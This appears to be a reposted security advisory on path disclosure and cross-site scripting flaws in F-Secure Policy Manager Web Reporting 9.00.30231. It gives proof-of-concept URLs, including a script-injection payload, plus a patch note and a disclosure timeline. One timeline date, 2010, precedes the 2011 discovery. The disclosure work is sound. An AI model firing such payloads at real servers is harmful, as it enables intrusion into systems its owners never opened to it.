F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus outbreaks before they actually occur.
Sow Ching Shiong, an independent vulnerability researcher has identified a Path Disclosure and Cross-Site Scripting vulnerability in F-Secure Policy Manager Web Reporting. This issue was discovered in a default installation of F-Secure Policy Manager Web Reporting 9.00.30231. Other earlier versions may also be affected.
Proof of concept
Path Disclosure
============
http://[target]:8081/report/infection-table.html
Cross-Site Scripting (XSS)
====================
http://[target]:8081/'"--></style></script><script>alert(1)</script>
Solution
F-Secure recommends that administrators of the affected systems patch or upgrade their systems.
References
Vendor URL: http://www.f-secure.com/en/web/labs_global/fsc-2011-2
Secunia: http://secunia.com/advisories/43049/
Disclosure Timeline
2011-01-17 - Vulnerability discovered.
2011-01-17 - Vulnerability reported to Secunia.
2010-01-25 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-24 - Patch released.
2011-02-24 - Advisory published by Secunia.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.